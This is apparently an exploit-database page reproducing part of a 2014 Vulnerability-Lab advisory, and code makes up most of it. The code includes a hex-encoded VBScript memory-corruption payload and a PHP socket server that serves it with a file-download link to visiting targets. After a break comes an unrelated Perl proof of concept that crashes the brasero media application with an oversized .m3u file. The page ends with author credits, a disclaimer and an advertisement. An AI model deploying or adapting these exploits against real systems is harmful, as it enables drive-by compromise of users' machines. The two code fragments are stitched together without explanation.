"\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".
"\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20".
"\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65".
"\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".
"\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29".
"\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20".
"\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36".
"\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20".
"\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20".
"\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64".
"\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64".
"\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d".
"\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e";
$msgd=str_replace("FILE_DOWNLOAD",$link,$msgd);
for (;;) {
if ($client = @socket_accept($reza)) {
socket_write($client, "HTTP/1.1 200 OK\r\n" .
"Content-length: " . strlen($msgd) . "\r\n" .
"Content-Type: text/html; charset=UTF-8\r\n\r\n" .
$msgd);
print "\n Target Checked Your Link \n";
}
else usleep(100000);
}
?>
...
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
$path="/tmp/r3z4.m3u";
my $PoC = "\x41" x 10000 ;
open(crash , ">", $path);
print crash $PoC;
close(crash);
use threads;
sub check_app { #thread sub
system("brasero $path");
return 0;
}
my @threads;
for (my $i = 0; $i < 20; $i++) {
my $thread = threads->create(\&check_app);
push(@threads, $thread);
}
foreach (@threads) { #join
$_->join();
}
Security Risk:
==============
The security risk of the security vulnerability in the html hta application is estimated as high. (CVSS 9.3)
Credits & Authors:
==================
Author: Mohammad Reza Espargham
Linkedin: https://ir.linkedin.com/in/rezasp
E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
Website: www.reza.es
Twitter: https://twitter.com/rezesp
FaceBook: https://www.facebook.com/mohammadreza.espargham
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
([email protected] or [email protected]) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo